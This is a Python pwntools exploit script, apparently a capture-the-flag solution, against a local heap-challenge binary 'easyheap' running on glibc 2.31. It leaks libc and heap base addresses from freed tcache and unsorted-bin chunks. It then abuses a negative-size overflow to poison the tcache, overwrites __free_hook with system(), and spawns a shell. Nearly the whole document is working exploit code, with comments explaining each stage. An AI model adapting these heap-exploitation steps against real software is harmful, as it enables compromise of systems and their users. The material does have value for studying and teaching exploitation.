| from pwn import *
# Target binary and the exact libc build the hard-coded offsets below were
# derived for. Swapping either means re-deriving every offset in this script.
binary = "./easyheap"
lib = "/usr/lib/x86_64-linux-gnu/libc-2.31.so"

# Spawn the target locally and load symbol tables for both objects.
p = process(binary)
elf, libc = ELF(binary), ELF(lib)
# Terse I/O wrappers around the process tube so the exploit stages below
# read like a short protocol transcript. Each one just forwards to `p`.
def s(buf):
    return p.send(buf)


def sl(buf):
    return p.sendline(buf)


def sa(delim, buf):
    return p.sendafter(delim, buf)


def sal(delim, buf):
    return p.sendlineafter(delim, buf)


def sh():
    return p.interactive()


def r(n=None):
    return p.recv(n)


def ra(t=tube.forever):
    return p.recvall(t)


def ru(delim):
    return p.recvuntil(delim)


def rl():
    return p.recvline()


def rls(n=2**20):
    return p.recvlines(n)
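def add(malloc_size, content, editable_size=None):
    """Menu option 1: allocate a chunk in the target and fill it.

    malloc_size   -- value sent at the (second) "Size: " prompt; by its name
                     this is what the target hands to malloc.
    content       -- data sent at the "Content: " prompt.
    editable_size -- when not None, sent at the first "Size: " prompt before
                     malloc_size. The exploit passes a *negative* value here
                     (that is the bug being abused), so the check is an
                     explicit `is not None`: a bare truthiness test would
                     silently skip the prompt for an explicit 0 and desync
                     the menu protocol.

    Which of the two "Size: " prompts means what is taken from the parameter
    names -- confirm against the binary if it misbehaves.
    """
    sal(">> ", "1")
    if editable_size is not None:
        sal("Size: ", str(editable_size))
    sal("Size: ", str(malloc_size))
    sal("Content: ", content)


def show(id):
    """Menu option 2: print the contents of the chunk stored at index `id`."""
    sal(">> ", "2")
    sal("Index: ", str(id))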
def free(id):
    """Menu option 3: release the chunk stored at index `id`.

    The target's behaviour after freeing (whether the slot is cleared) is
    not visible from here; the exploit relies on being able to free and
    re-use low indices repeatedly.
    """
    sal(">> ", "3")
    sal("Index: ", str(id))
def leakheap():
    """Leak a heap pointer via a tcache next-pointer.

    Two tiny chunks are allocated and freed (both land in the same tcache
    bin), one is taken back with a single "A" written into it, and index 0
    is printed. Presumably the print runs past the "A" into the leftover
    tcache `next` pointer, which the caller then fixes up into the heap
    base -- the exact arithmetic lives in the caller.
    """
    for _ in range(2):
        add(0x1, "", 0xfff)
    for idx in (0, 1):
        free(idx)
    add(0x1, "A", 0xfff)
    show(0)
def leaklibc():
    """Leak a libc pointer through the unsorted bin.

    Eight 0x80-byte chunks are allocated; indices 7..1 are freed first,
    which should fill the tcache bin for that size (it holds 7), so the
    final free(0) goes to the unsorted bin and gets main_arena pointers
    written into it. Re-allocating a small chunk with "A" in it and
    printing index 0 then exposes that pointer; the caller turns it into a
    libc base with an empirically derived offset.
    """
    for _ in range(8):
        add(0x80, "A", 0xfff)
    for idx in range(7, 0, -1):
        free(idx)
    free(0)
    add(0x1, "A", 0xfff)
    show(0)
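# --- Stage 1: libc leak ------------------------------------------------------
leaklibc()
# Grab the last 6 bytes up to and including the 0x7f high byte (a userspace
# libc address on x86-64) and widen to 8. If the output never contains 0x7f
# this blocks until the tube timeout, so a wrong libc/offset shows up here.
leak = u64(ru("\x7f")[-6:] + "\x00\x00")
# 193 and 0x10 are empirically derived for this libc build (the leaked
# pointer's low byte was partly overwritten by the "A"); re-derive if the
# libc changes rather than trusting these numbers.
malloc_hook = leak - 193 - 0x10
libc.address = malloc_hook - libc.sym["__malloc_hook"]
info("libc base => 0x%x" % libc.address)
# A libc base is page aligned. A misaligned value means the leak was
# mis-parsed, and every later write would then target garbage -- fail fast
# instead of crashing the target in stage 3.
if libc.address & 0xfff:
    error("libc base 0x%x is not page aligned -- leak parsing failed" % libc.address)
# Release index 0 again so the next stage starts from a free slot.
free(0)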
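# --- Stage 2: heap leak ------------------------------------------------------
leakheap()
ru("Content: ")
# Six raw bytes of the leaked heap pointer, widened to 8. The 0x241 offset is
# empirical for this binary (it accounts for the "A" clobbering the low byte
# and the chunk's position after the tcache struct) -- re-derive on change.
heap = u64(r(6) + "\x00\x00") - 0x241
info("heap base => 0x%x" % heap)
# The brk heap starts page aligned; anything else means the leak is wrong
# and the forged tcache key below would be garbage.
if heap & 0xfff:
    error("heap base 0x%x is not page aligned -- leak parsing failed" % heap)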
# --- Stage 3: tcache poisoning into __free_hook ------------------------------
# Overflow payload: 0x10 bytes of filler, then a forged chunk header
# (prev_size 0, size 0x90) followed by what looks like the neighbouring
# chunk's tcache entry: next -> __free_hook-8 and a key of heap+0x10, which
# in glibc 2.31 is where tcache_perthread_struct sits, so the entry still
# passes the double-free key check. The -0x217 "editable size" is the bug
# being abused: the target presumably treats it as unsigned, letting the
# write run past the 0x48-byte chunk into its neighbour.
poison = "".join([
    "A" * 0x10,
    p64(0),
    p64(0x90),
    p64(libc.sym["__free_hook"] - 0x8),
    p64(heap + 0x10),
])
add(0x48, poison, -0x217)

# The first 0x80 allocation should take the poisoned chunk off the tcache
# list; the second is then served at __free_hook-8, so "/bin/sh\0" lands
# just below the hook and system()'s address lands on the hook itself.
hook = "/bin/sh\x00" + p64(libc.sym["system"])
add(0x80, "", 0xfff)
add(0x80, hook, 0xfff)

# free(ptr) now calls __free_hook(ptr) == system(ptr). Index 3 is assumed
# to hold the allocation that starts with "/bin/sh" -- confirm if the shell
# does not appear.
free(3)
sh()